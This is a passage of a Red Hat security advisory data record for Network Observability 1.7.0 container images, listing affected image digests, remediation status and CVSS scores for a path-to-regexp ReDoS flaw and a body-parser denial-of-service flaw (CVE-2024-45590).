"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", 